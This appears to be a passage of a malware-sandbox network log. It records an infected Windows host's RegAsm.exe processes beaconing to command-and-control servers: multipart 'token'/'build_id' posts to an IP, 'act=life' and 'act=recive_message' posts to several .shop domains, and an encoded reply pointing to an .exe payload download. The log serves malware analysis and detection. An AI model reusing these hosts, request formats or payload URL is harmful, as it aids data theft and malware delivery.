2024-09-21 16:52:03 UTC	16126	OUT	Data Raw: 34 69 43 76 4a 4c 2b 76 6d 66 52 57 72 51 79 7a 57 49 45 4d 5a 6b 64 4a 6f 5a 64 67 49 42 59 4a 49 72 45 44 4a 41 7a 67 48 71 61 35 6e 78 4e 6f 38 32 74 71 4c 69 33 30 61 38 68 76 6c 47 41 37 50 44 74 63 65 6a 59 6b 2f 49 31 76 7a 58 2b 72 4a 71 6f 74 34 74 46 38 32 7a 4c 71 44 64 66 61 6b 58 43 6e 47 54 73 36 38 63 38 64 38 56 4c 59 58 6d 6f 33 45 37 4a 65 61 58 39 6b 6a 43 35 44 2f 61 46 6b 79 63 6a 6a 41 2f 48 38 71 32 6a 4e 77 6b 70 52 64 6d 6a 76 6e 4b 6e 55 54 70 7a 54 61 65 6d 7a 74 2b 58 34 6e 6a 51 4f 56 42 39 52 53 30 31 50 38 41 56 72 39 42 54 6a 58 32 74 4e 74 77 54 5a 2b 61 31 59 71 4e 53 55 56 30 62 43 6a 76 53 55 56 5a 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 6c 41 43 30 6d 61 4b 44 51 41 55 55 55 55 41 46 46 46 46 41 42 Data Ascii: 4iCvJL+vmfRWrQyzWIEMZkdJoZdgIBYJIrEDJAzgHqa5nxNo82tqLi30a8hvlGA7PDtcejYk/I1vzX+rJqot4tF82zLqDdfakXCnGTs68c8d8VLYXmo3E7JeaX9kjC5D/aFkycjjA/H8q2jNwkpRdmjvnKnUTpzTaemzt+X4njQOVB9RS01P8AVr9BTjX2tNtwTZ+a1YqNSUV0bCjvSUVZAUUUUAFFFFABRRRQAUUUlAC0maKDQAUUUUAFFFFAB
2024-09-21 16:52:05 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:52:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 16:52:05 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49763	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:52:06 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBGCBGCAFIIECBFIDHI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:52:06 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 35 63 39 65 64 30 63 35 30 39 38 30 33 34 39 36 62 62 38 65 62 35 36 66 39 39 36 39 66 37 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74 Data Ascii: ------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="token"e95c9ed0c509803496bb8eb56f9969f7------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------ECBGCBGCAFIIECBFIDHICont
2024-09-21 16:52:06 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:52:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 16:52:06 UTC	99	IN	Data Raw: 35 38 0d 0a 4d 54 45 34 4d 44 6b 32 4e 58 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 77 63 6d 39 6e 4c 7a 59 32 5a 57 56 6d 4d 47 4e 68 4d 47 5a 69 4d 7a 56 66 62 47 5a 6b 63 32 45 75 5a 58 68 6c 66 44 46 38 61 32 74 72 61 33 77 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: 58MTE4MDk2NXxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9wcm9nLzY2ZWVmMGNhMGZiMzVfbGZkc2EuZXhlfDF8a2tra3w=0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49765	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:52:10 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGCAAAFCBFBAKFHJDBKJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:52:10 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 43 41 41 41 46 43 42 46 42 41 4b 46 48 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 35 63 39 65 64 30 63 35 30 39 38 30 33 34 39 36 62 62 38 65 62 35 36 66 39 39 36 39 66 37 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 41 46 43 42 46 42 41 4b 46 48 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 41 46 43 42 46 42 41 4b 46 48 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 Data Ascii: ------DGCAAAFCBFBAKFHJDBKJContent-Disposition: form-data; name="token"e95c9ed0c509803496bb8eb56f9969f7------DGCAAAFCBFBAKFHJDBKJContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------DGCAAAFCBFBAKFHJDBKJCont
2024-09-21 16:52:11 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:52:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 16:52:11 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49766	104.21.9.6	443	5224	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:52:10 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: appleboltelwk.shop
2024-09-21 16:52:10 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-21 16:52:11 UTC	776	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 16:52:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=oklii8hid2te72u67rtt24fgc5; expires=Wed, 15 Jan 2025 10:38:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w1mesxmJ41KLHNBn%2BRyofB5W6bwc%2FztPtg53Pqw82y7qoG99qEJaf9h5vEmg8c3NCpnBQ0KJ1so%2BFkrCdS6JqRcslYIHr2tiuFF6yeArJ%2BKhrVJcMbdE8UUK345ZZLWM%2FM3EGo0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c6b9070aab15e76-EWR
2024-09-21 16:52:11 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-21 16:52:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49767	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:52:11 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHIECAFCGDBFHIDBKFC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:52:11 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 45 43 41 46 43 47 44 42 46 48 49 44 42 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 35 63 39 65 64 30 63 35 30 39 38 30 33 34 39 36 62 62 38 65 62 35 36 66 39 39 36 39 66 37 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 45 43 41 46 43 47 44 42 46 48 49 44 42 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 45 43 41 46 43 47 44 42 46 48 49 44 42 4b 46 43 0d 0a 43 6f 6e 74 Data Ascii: ------AEHIECAFCGDBFHIDBKFCContent-Disposition: form-data; name="token"e95c9ed0c509803496bb8eb56f9969f7------AEHIECAFCGDBFHIDBKFCContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------AEHIECAFCGDBFHIDBKFCCont
2024-09-21 16:52:12 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:52:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 16:52:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49768	188.114.96.3	443	5224	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:52:11 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: surveriysiop.shop
2024-09-21 16:52:11 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-21 16:52:12 UTC	772	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 16:52:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4rrt5snhv4si2ht9ffmqvt7s1q; expires=Wed, 15 Jan 2025 10:38:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KCMSaphQDv7SZ4IfyxW0p4ayGt7JwSJOeuWdS1PDmuhPM0gbL7W6jIzCqJMafGkHFbj2ZxDmp%2Bdo6Bk8BHRdI36RfcQjZVVsI32qpD4JO3H5SCggL%2FW7HqoPgj9yPRhXFuosCw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c6b90776fa0c463-EWR
2024-09-21 16:52:12 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-21 16:52:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49769	188.114.96.3	443	5224	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:52:12 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: captainynfanw.shop
2024-09-21 16:52:12 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-21 16:52:13 UTC	772	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 16:52:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m6pmfedn1ihg7gcn3j9pb80hdg; expires=Wed, 15 Jan 2025 10:38:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EGfEuGMe1eZVb197%2FskWNi88yN3ac6VuRlb5qBkLC%2B8NWSwLzeLzK1nyFejS8omFrElXPBIMOY0sf2WnkkOJGelHcAC0tY9TGKIEsjPq5pUUmSRdTKjvtd4b%2BJ9dYuNikaeiq2w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c6b907d288f428b-EWR
2024-09-21 16:52:13 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-21 16:52:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49772	172.67.203.61	443	5224	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:52:13 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: tearrybyiwo.shop
2024-09-21 16:52:13 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-21 16:52:14 UTC	772	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 16:52:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7ao3f3mhfqg776bsr7rp7b57lt; expires=Wed, 15 Jan 2025 10:38:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xj9rZIxtKuvd6lrAbfI0fcJs1jfBPQVBq%2F2p5VnY%2BiN9hIvb%2BefFJMTDx%2BsvjY%2Bf1%2FshDhckDMeivcNSlbIC32KEIjPlxR5uDutDDgEYxuPh8HV5GpD7djdkAxKUaEN5I3Wy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c6b9083ad953308-EWR
2024-09-21 16:52:14 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-21 16:52:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49771	45.132.206.251	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:52:14 UTC	188	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Connection: Keep-Alive Cache-Control: no-cache Host: cowod.hopto.org
2024-09-21 16:52:14 UTC	183	IN	HTTP/1.1 200 OK Server: openresty Date: Sat, 21 Sep 2024 16:52:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: cowod.hopto.org

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49773	104.21.9.6	443	5224	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:52:14 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: appleboltelwk.shop
2024-09-21 16:52:14 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-21 16:52:15 UTC	784	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 16:52:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hvfcr1srj5m81ma9c8ukj4pb14; expires=Wed, 15 Jan 2025 10:38:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FAI6RfeW%2FeE%2B6BjMcNPs8ABc43E48AX2BP44M7qtyr13A8ms%2Bln%2BEAvmS03EIyyDgBOUHrps91dhriFc0SyuXelZUJz%2F51%2By3Krq2Id%2B9FKZ4%2Fkzi5bnmzoVcdNOx6llQjhVh8E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c6b9089dd790cb0-EWR
2024-09-21 16:52:15 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-21 16:52:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49774	104.21.16.38	443	5224	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:52:15 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: tendencerangej.shop
2024-09-21 16:52:15 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-21 16:52:15 UTC	553	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 16:52:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=feM5PTuriBsMQ7doF1UTtVjv9cvX5GCLdYsl%2Ft1JzIbKp6Pq9Pxa1uGBDREzrNmbYHu2lBZjzEtRDrL%2Feua%2BWoPuyWu8JKktqIElJj6RLVUEwM7sMVtnj5U%2B7tN1H%2FnUgB3ttuIU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c6b908f99520f41-EWR
2024-09-21 16:52:15 UTC	816	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-21 16:52:15 UTC	1369	IN	Data Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f Data Ascii: s/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('co
2024-09-21 16:52:15 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 69 77 65 30 4c 2e 37 34 56 76 57 4c 4a 44 42 43 6b 39 4c 77 32 75 5a 6a 6e 32 63 68 68 54 4d 69 36 6e 66 67 55 4c 67 30 57 56 59 2d 31 37 32 36 39 33 37 35 33 35 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 Data Ascii: <input type="hidden" name="atok" value="iwe0L.74VvWLJDBCk9Lw2uZjn2chhTMi6nfgULg0WVY-1726937535-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
2024-09-21 16:52:15 UTC	851	IN	Data Raw: 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c Data Ascii: sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare<
2024-09-21 16:52:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49775	104.21.16.38	443	5224	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:52:16 UTC	356	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=iwe0L.74VvWLJDBCk9Lw2uZjn2chhTMi6nfgULg0WVY-1726937535-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: tendencerangej.shop
2024-09-21 16:52:16 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=
